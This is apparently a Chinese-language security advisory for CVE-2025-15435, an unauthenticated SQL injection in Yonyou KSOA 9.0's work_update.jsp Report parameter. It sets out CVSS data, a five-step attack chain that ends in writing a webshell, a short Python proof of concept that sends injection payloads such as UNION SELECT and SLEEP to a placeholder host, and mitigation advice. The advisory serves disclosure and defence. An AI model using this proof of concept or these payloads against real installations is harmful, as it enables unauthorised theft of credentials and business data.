CVE-2025-15435: 用友KSOA 9.0 work_update.jsp SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15435

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

用友KSOA 9.0

漏洞概述

CVE-2025-15435是影响用友KSOA 9.0版本的一个高危SQL注入漏洞。该漏洞存在于/worksheet/work_update.jsp文件中的Report参数，攻击者可以通过构造恶意的SQL语句实现未授权的数据库操作。由于该漏洞可远程利用且无需认证，攻击者可以在不需要任何用户交互的情况下发起攻击，成功利用后可获取数据库中的敏感信息，包括用户凭证、业务数据等。漏洞披露后，相关利用代码已被公开发布，增加了被恶意利用的风险。用友厂商在收到漏洞报告后未做出任何回应，导致该漏洞长时间处于未修复状态。建议使用该产品的企业尽快采取临时防护措施，并持续关注厂商更新。

技术细节

用友KSOA 9.0的/worksheet/work_update.jsp接口存在SQL注入漏洞。漏洞点位于Report参数，攻击者可通过该参数注入任意SQL语句。由于程序未对用户输入进行充分的过滤和参数化查询，恶意SQL代码将被直接拼接到数据库查询语句中执行。攻击者可利用UNION SELECT等技术提取数据库中的敏感信息，如管理员账户和密码哈希。在某些配置下，攻击者甚至可能通过SQL注入写入webshell，实现远程代码执行。该漏洞的CVSS评分为7.3，属于高危级别，攻击向量为网络级别，无需认证和用户交互即可发起攻击。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标服务器，识别用友KSOA 9.0的安装，并确认/worksheet/work_update.jsp接口存在

STEP 2

步骤2

漏洞探测：攻击者向work_update.jsp的Report参数发送测试载荷，验证SQL注入漏洞的存在

STEP 3

步骤3

信息提取：利用UNION SELECT等SQL注入技术提取数据库中的敏感信息，如用户表、配置信息等

STEP 4

步骤4

权限提升：若获取到管理员凭证，攻击者可登录后台管理系统获取更高权限

STEP 5

步骤5

持久化控制：在某些情况下，攻击者可能通过SQL注入写入webshell，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15435 SQL Injection PoC for Yonyou KSOA 9.0
# Target: /worksheet/work_update.jsp
# Parameter: Report

target_url = "http://target.com/worksheet/work_update.jsp"

# Basic SQL injection test payloads
payloads = [
    "' OR '1'='1",
    "' UNION SELECT NULL--",
    "' UNION SELECT 1,2,3--",
    "' AND SLEEP(5)--"
]

def test_sql_injection():
    for payload in payloads:
        params = {'Report': payload}
        try:
            response = requests.get(target_url, params=params, timeout=10)
            print(f"Payload: {payload}")
            print(f"Status: {response.status_code}")
            print(f"Response Length: {len(response.text)}")
            print("-" * 50)
        except requests.exceptions.RequestException as e:
            print(f"Error: {e}")

if __name__ == "__main__":
    test_sql_injection()

影响范围

用友KSOA 9.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 使用Web应用防火墙对/worksheet/work_update.jsp接口进行访问控制，拦截异常的SQL语句；2) 通过网络层ACL限制该接口的访问来源，仅允许受信任的IP访问；3) 临时关闭或禁用该功能模块；4) 加强对数据库的监控，及时发现异常查询行为；5) 定期备份数据库，以防数据泄露或篡改。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15435
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15435
3 Details https://www.cvedetails.com/cve/CVE-2025-15435/
4 VulDB https://vuldb.com/cve/CVE-2025-15435
5 Link https://github.com/xiaozipang/CVE/issues/1
6 Link https://vuldb.com/?ctiid.339362
7 Link https://vuldb.com/?id.339362
8 Link https://vuldb.com/?submit.721918